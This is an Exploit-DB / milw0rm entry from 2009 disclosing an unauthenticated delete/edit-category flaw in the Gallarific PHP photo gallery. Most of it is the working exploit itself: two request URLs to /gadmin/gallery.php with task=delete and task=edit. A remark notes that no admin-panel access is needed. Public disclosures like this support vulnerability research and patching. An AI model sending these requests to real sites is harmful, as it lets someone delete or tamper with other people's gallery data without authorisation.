Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category

EDB-ID:

9421

CVE:

N/A




Platform:

PHP

Date:

2009-08-12


# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */

side note:
Original Advisory without poC : http://secunia.com/advisories/29399

# milw0rm.com [2009-08-12]